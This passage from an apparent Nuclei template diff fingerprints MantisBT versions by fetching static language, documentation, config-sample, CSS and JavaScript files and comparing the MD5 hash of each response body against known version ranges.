1.0.8 + dsl: + - "(\"ed9486782d1776d5f627e28161688df9\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + 
dsl: + - "(\"7bacf4ac892f2be68e43218c76f9a31e\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"42518509392b761122a379cd2ba2a99b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"4781d3df05bfd8911974c18052ce2601\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"eee56130a53da6bb243d40fae4ddacab\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"1746a0cf0d5984872398b6193e9754c3\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"09b7ac79b076fe2e8b6198a58232b482\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2c35e0009d8db1b99b2ce99fc66909ea\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"85569e0d2bf2f73f0bd366c676ebeee0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_euc.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"212d6df9c9d9a26f15cb12dbe0661d4f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"b357e8441adf0e8f5d9c19032682c477\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2b0eb38a5b5500dd66f6fc85036e20ad\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f80699a4c1d17478c49f276ed82ab057\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"b4f631b01c0eb100e6f48f5114b02152\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese_sjis.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"6bad679a9231097b91e4e9281356c938\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"bc0c3abecdf15c034fe0b68168c600fe\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"ee10f7b426ae99c14c1d26534d27c134\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"8c3b195112b7094a0284c99527e77db8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"5ac9a928b8d1b3bbb2824e93d9b12aa5\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ta.txt" + + matchers: + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"62fead39d666c8cb6737b734158f1139\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7833ba9a015ca653f2066bf025423cd1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/page_descriptions.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"464d60b42881287194b39c506444afc3\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d2a41796705e0fd14ea660ca72652fe3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/project_management.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"216926dd3af65dcd8bb909a8b29fca3a\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"79d8ce09a4cfdad0c3dab14f86dde4d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/user_management.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"cf354340e84aae670500a77a659676e7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9898f7e63e46f44f4e8f6bbd2f0932fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/workflow.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"c7fea89f8e35467ff3410a54a958d2dc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"1f5caaf3620619dc0a37c61723ed8fc3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/about.sgml" + + matchers: + - type: dsl + name: 1.2.20 + dsl: + - "(\"3cd1576073b410eb994881ddb81f584b\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.19 + dsl: + - "(\"3029687e45563dccd0fc4c1ab472c5db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/troubleshooting.sgml" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - 
"(\"27152036282fe7d487409972f034b7a5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0069a3e7efa1393f32072997c8218ef3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/README.libs" + + matchers: + - type: dsl + name: 1.2.3 - 1.2.11 + dsl: + - "(\"58a1f60b3e0a1803a6221f2ad3c86921\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"8d8c9707bc07112d344552ecf578e5d4\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"4675e760906489b1da1b5aeeff6ef1e0\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"0f0e55e9d058faf89e02ad055df2fdb5\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"f838e122c93f845a88f3c05d88edc58e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo_232x80.png" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/config_inc.php.sample" + + matchers: + - type: dsl + name: 1.2.9 + dsl: + - "(\"d23628c6c35c4d99856c936693f1c39d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"5f3ddb7fc1bc44f79c434ac90eb0cbd4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"9169fb4c690787814980ae92c26ad6c6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e2ae1f0a045a672d978674590e340905\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"240c9bfbbfc1347db8a0c900f68e32d5\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.12 + dsl: + - "(\"39d8aaab882bea5c059b2bf7ba1c378d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4c60109bbc91dfe5fcf13d00005569d7\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"a94ecf4fa055bccb443ad6576ab89488\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"0718d32c43cc6de832e2915328ad56eb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/common.js" + + matchers: + - type: dsl + 
name: 1.2.9 - 1.2.12 + dsl: + - "(\"4f392c05c3b19efa688361eab0885e9c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"4f8814a92419dc810d3455596cf4c5bd\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"3519e462251f88664d881f1929d5563e\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"3c612c4a36df4ef105089de27c0532da\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.19 + dsl: + - "(\"2266315828482c035856a5c59aea7202\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fd2bd904e0d559e10a66a85ae5c27caa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"de7d1ab7b6896417746460e306311f04\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"eaa2bb8c7fb2a1be1c7d90d454769487\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-output.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"32c1619152d357bda4154beacc8f4de3\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"3dff931edd7087fb90f3e0ff3e53f0a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-manage.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"23a3f3efa90e7e708addd6729c912643\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"9905d2f4c3e4338e235acd247caf1392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-account.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.19 + dsl: + - "(\"85dbdf38639de0cb8df7045d20276ce7\" == md5(body))" + - type: dsl + name: 1.2.20 + dsl: + - "(\"da1ddf9429d172fa60cba546e164669c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/admin.css" + + matchers: + - type: dsl + name: 1.3.1 - 1.3.20 + dsl: + - "(\"4f2b2798246f984affc4ad7c1031fba4\" == md5(body))" + - type: dsl + name: 1.3.0 
+ dsl: + - "(\"75335f0130e7e9162339e35bbabf82a0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"1fc6578e8bdb3999221c7c0dec15f063\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"95b161401db7f2b70222201ce503ea6a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5d12e7754a0cef43686b86ff1ce96811\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ea19cfd8365239c4c60c6d8d9582dd00\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"02a479b01ab4f157b94d0ed90506c7c7\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"685ad3cb3595d18d6496e861d4e6f0a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"5ab357198c04e5d998db76935948637f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"e76e13ea009c1e9d48a8f7f10bad9251\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"327f4408b91edbda14d4086eb5ec2c89\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"aa26c8656fcc0ed851cd4b6500f37758\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.1.3 + dsl: + - "(\"6990c0b678fb5cfebbebbc1254f474e7\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"84b23427fef16da479f6e4dc3e60c3f8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"4825dd28ba91f729ae84b4fcf933656d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3f70c73f17c1259bb6e502d57d0fb6a8\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"32d9a5e4a5b001a73ba01ea39b5ffc94\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"abe859c3d9cedeb6e345dadd3a97174a\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"59c42a5ce3d0f686861f1eebf74dd6b6\" == md5(body))" + 
+ - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"bf69ed1796f74525aadfc30190849304\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9aa9f4de15b2620da11fd54abe8a19f2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e9f7a4fde76f274ce4f4d7ca788a9423\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cd49036fff622679418d1ee249badbc3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"678d3b7d85bf8b58ff6542d4dee51bc0\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9ba195cf4b57965b55b618fbf94c56a5\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fb216576053f3181c5ee230a5d0d2fec\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"37dd357a4d978439cc844431034b606b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.24.3 + dsl: + - "(\"554b6acdbfd9a52e2668361eb7c3a3b1\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.2.4 + dsl: + - "(\"7527a104612d3d179b296c2ae788d5ec\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2a4b3fbe738c3880dfbaece32211df67\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"659eff620235c24db0a6740a1f88ae86\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"31016b13fe83cdfcf7c0a0ed869b979c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"99b657e1fa13440b7e9750c16fe2be52\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"6e0ec9de583cbd28d540dddc77515d24\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"59663028cc5fb6baf900e18c97de872e\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"00636145dd84677eb193ab3caab8e6b3\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/plugins/XmlImportExport/lang/strings_vietnamese.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"c57152c3d1ae992b38454207cd6507e4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"590d44fc317ce0c29c314cf8a229c671\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ba181e70c66abb52bdc1322f0720c110\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ec62e5c014c5786b724e077b1f55bb96\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0c90cd4da6a4b985acec502d2ca8e3dd\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4fe79b389f7e971810b584365ce4a98b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8048d1d6d3bd7d2f151d36cff75e4375\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f0ee771ae9a8b92bcc98bfbf65e076e9\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c368bc061df8579e826088db706260f9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"625accb84972d362f2087d7283814402\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"aec2452afb86d7effa903aae1732aff4\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c1d48005c0fe73d26b1eeb261dd137e3\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"187f05e65558487f4d5eeb8c9e2e0838\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"fb8e1cbacc9a44c7b5fbcc61464c0852\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"0ee6e6ede93648841310aa78188ea717\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_romanian.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"56608fd7afcac11b668534ede128264d\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"389195122b3609a7ff8ea8092bf92042\" 
== md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6293fbc72809c674f5b4ecf6acab8259\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"30ec77e99496703e1f877ec11f484996\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"dde356baa56bb9a21fcba8ccebe0a494\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"96998bd7920c43027359b187189eb0b7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"14415a935c411d4872a8de7a36dac617\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"574e0346144de5e588a9f83a66aaaf28\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ee72563102bc20446f20b475a22ad173\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d28e0b09053cc3f26f880ff90248e0bc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c1a7df79c529faf3d121aa387d498e57\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"dd6dac1df1fb229e953b2d537f7f34ac\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1a768c0c010bc3db5a3fe135ff1f90c4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"6cc76b9695079ed1c9e8356fdbbe7a77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2e6fcd4e0016a2b7c01e3b694ddb4723\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"f1f98b082f1a21ae23ddf0629ec89de8\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"41bb32a493644d798bcf4a30d6f06bc3\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"29d32fcee8f30aa20f69605f0d81427b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"153ce917f5ab01f7186e105a3b946ae3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + 
- "(\"a1f01d6e1fcd2a2cec92803ad79c9424\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"5173742979f0c49a462d11edda14462a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"169c3dcab8ca1a8151e544200ac5e452\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ade763db2735c1f4a8caa5bd04f91b9d\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"cc4d545dd494f8a1644bcea449397ad7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5a9c8c075b21810074dfc8e15446dbae\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"3203e85f921c2588b870ac8133a8ca17\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"b08b7098b467efab079940c864eef67d\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"568c095b3c5abff6ca80478837f4707a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.24.3 + dsl: + - "(\"309829a0d5ebd7918bbbb14bb0e0c7f8\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.1.3 + dsl: + - "(\"67db6b5c0f418bebf17295a7557db8a1\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"5860cc682d0a3ed79a025c1105a0ca84\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"db935da62106762ab3652db2a9b76d83\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"08f0f32492e7834e900a5fe76e8cd7b8\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"be1ffc606389e4e877c3300020f65234\" == md5(body))" + - type: dsl + name: 1.2.14 - 1.2.16 + dsl: + - "(\"95544e1de21f48525ab9613058909eb0\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"de01554b4fbf5b16533310b8514f9ea8\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"0b254acf9549fbd94f4712dc8c2f723e\" == md5(body))" + - type: dsl 
+ name: 1.2.0 - 1.2.1 + dsl: + - "(\"611afee7920dddf90729cd37c78dc517\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"f413936c08d01aa8068a368f9843b93d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"47da723680e05e9e82d9f86609d80553\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"bdfc1383a9ab545997eea124b16cc8d0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"38a44697a7b13184d846fe2fa273421a\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"2c61814d1d6e107afdd684b6f476dc79\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"04744ad86ab2107dc29a3f92056c0bb9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"08e87e38cd6641472245be899d021a35\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0dde7a24f454f3959c7308a6b86f64dd\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"cb72516420341f557620bfeaee723cc9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"01e86d1048a4b5bcdbc7839a8dc02726\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"700f50d126c9aebe188bce021ef0ed5b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"64cb420e63e74f111ba5e73d0a8ef2d3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"93519d06759ca0e1a47424e6e3b92717\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9ec7bfbec69f4b347dda291b208c1b93\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1c34902383b543d3ae039218d87dfe27\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"7f9fcceed1089b7c5145b9c01b065553\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - 
"(\"80d4904ac9f1ab2a62a0bcf05b8f0e2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"597d89e1f97b371bd5fe21a9984d677c\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"4bcda4ca655f468738f904ce76a36eb6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0c29b3726a8c4d3c3ed106da6324b095\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"637f20e22534c4d0b36572520692e7e6\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1b06a40b2e90bc1fad2faa66632df422\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"e1ef47f10ecb87d04c5765df9b34e33c\" == md5(body))" + - type: dsl + name: 1.2.10 - 1.2.12 + dsl: + - "(\"2dff12cb856dad4cd04398a6df62da96\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"5b060af8b3a6aa8fd7f31c93ad250c54\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"8d6fbcadd407f6fb3a29c342773fe59b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"49d22ca6bf353e088170b04c0cc42cee\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a5674d61b8676435b01c56fc53885ad3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6c7c2cd920285641c073a273a1204335\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8a6c0cac500b94d08b04b3987447dffd\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"ffc646e1ab382bbea14e1aec96f7f185\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"905a49aa6fe70e11789d8070f3c4c0b2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"83f925cc813188dd541a5f6595a5e87e\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"3736647fe24b962d112e4af56056fdf8\" == md5(body))" + + - 
method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"68b0fdb38374fe27ed8af8b262615dda\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"5f94e50b77376ced979a2c0d80357227\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"ecfc5a483f9357976b1f89d2a4c07d37\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"690e0c323d503a478da3848fc21da250\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"309d927b63e4785bc0e444c7cd64fff7\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"12eb578d687649c46b212644c1b9cca9\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"410b625752ff4217d7211af1fd6ddf3f\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c6547db4e0e0c86a37eb33985e8cd74b\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4556c80d55dcec09b17deafb0ad895db\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"1abd8a7764f727b9e8a1dc0cae3f7165\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"1489f41004fc428aff6172486664f19e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"1ed92690517d2085dd662aac34b18c55\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2f5e8a00ac149936db4c854e6b6ecd55\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"d76f27cea9407df9318ac7c138adf547\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"16d154b1beebabb0cecefda0f1bd84dd\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d1d6432b909a2f5a975304af4d24e623\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"f4629b1eb23286830a7645c5eb892dab\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - 
